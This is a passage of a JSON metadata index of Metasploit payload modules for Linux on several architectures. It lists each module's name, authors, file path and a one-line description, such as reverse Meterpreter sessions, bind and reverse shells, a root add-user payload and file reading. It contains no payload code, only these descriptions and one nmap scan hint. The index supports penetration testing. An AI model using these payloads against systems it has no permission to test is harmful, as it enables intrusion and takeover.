"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64le/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/ppc64le/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc64le",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64le/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/ppc64le/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc64le",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppce500v2/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/ppce500v2/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppce500v2",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppce500v2/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/ppce500v2/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppce500v2",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppce500v2/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/ppce500v2/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppce500v2",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/exec.rb",
"is_install_path": true,
"ref_name": "linux/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter/bind_tcp": {
"name": "Linux Mettle x64, Bind TCP Stager",
"full_name": "payload/linux/x64/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Brent Cook <bcook@rapid7.com>",
"ricky"
],
"description": "Inject the mettle server payload (staged). Listen for a connection",
"references": [
],
"platform": "Linux,Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter/reverse_tcp": {
"name": "Linux Mettle x64, Reverse TCP Stager",
"full_name": "payload/linux/x64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Brent Cook <bcook@rapid7.com>",
"ricky",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-05 16:30:19 +0000",
"path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/x64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/x64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/x64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell/bind_tcp": {
"name": "Linux Command Shell, Bind TCP Stager",
"full_name": "payload/linux/x64/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x64/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-05 16:30:19 +0000",
"path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_bind_ipv6_tcp": {
"name": "Linux x64 Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/linux/x64/shell_bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"epi <epibar052@gmail.com>"
],
"description": "Listen for an IPv6 connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-14 16:32:19 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_bind_tcp_random_port": {
"name": "Linux Command Shell, Bind TCP Random Port Inline",
"full_name": "payload/linux/x64/shell_bind_tcp_random_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Geyslan G. Bem <geyslan@gmail.com>"
],
"description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_tcp_random_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/x64/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mak"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_reverse_ipv6_tcp": {
"name": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/linux/x64/shell_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"epi <epibar052@gmail.com>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-06 20:18:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/adduser": {
"name": "Linux Add User",
"full_name": "payload/linux/x86/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Create a new user with UID 0",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/adduser.rb",
"is_install_path": true,
"ref_name": "linux/x86/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_linux/x86/chmod": {
"name": "Linux Chmod",
"full_name": "payload/linux/x86/chmod",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Runs chmod on specified file with specified mode",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/chmod.rb",
"is_install_path": true,
"ref_name": "linux/x86/chmod",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/x86/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/exec.rb",
"is_install_path": true,
"ref_name": "linux/x86/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_ipv6_tcp": {
"name": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>"
],
"description": "Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_ipv6_tcp_uuid": {
"name": "Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_nonx_tcp": {
"name": "Linux Mettle x86, Bind TCP Stager",
"full_name": "payload/linux/x86/meterpreter/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject the mettle server payload (staged). Listen for a connection",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_tcp": {
"name": "Linux Mettle x86, Bind TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>"
],
"description": "Inject the mettle server payload (staged). Listen for a connection (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_tcp_uuid": {
"name": "Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/find_tag": {
"name": "Linux Mettle x86, Find Tag Stager",
"full_name": "payload/linux/x86/meterpreter/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject the mettle server payload (staged). Use an established connection",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/find_tag.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_ipv6_tcp": {
"name": "Linux Mettle x86, Reverse TCP Stager (IPv6)",
"full_name": "payload/linux/x86/meterpreter/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Inject the mettle server payload (staged). Connect back to attacker over IPv6",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_nonx_tcp": {
"name": "Linux Mettle x86, Reverse TCP Stager",
"full_name": "payload/linux/x86/meterpreter/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_tcp": {
"name": "Linux Mettle x86, Reverse TCP Stager",
"full_name": "payload/linux/x86/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_tcp_uuid": {
"name": "Linux Mettle x86, Reverse TCP Stager",
"full_name": "payload/linux/x86/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/x86/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/x86/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/x86/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/metsvc_bind_tcp": {
"name": "Linux Meterpreter Service, Bind TCP",
"full_name": "payload/linux/x86/metsvc_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/metsvc_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/metsvc_reverse_tcp": {
"name": "Linux Meterpreter Service, Reverse TCP Inline",
"full_name": "payload/linux/x86/metsvc_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/metsvc_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/read_file": {
"name": "Linux Read File",
"full_name": "payload/linux/x86/read_file",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hal"
],
"description": "Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/read_file.rb",
"is_install_path": true,
"ref_name": "linux/x86/read_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_ipv6_tcp": {
"name": "Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/shell/bind_ipv6_tcp_uuid": {
"name": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/shell/bind_ipv6_tcp_uuid",
"rank": 300,
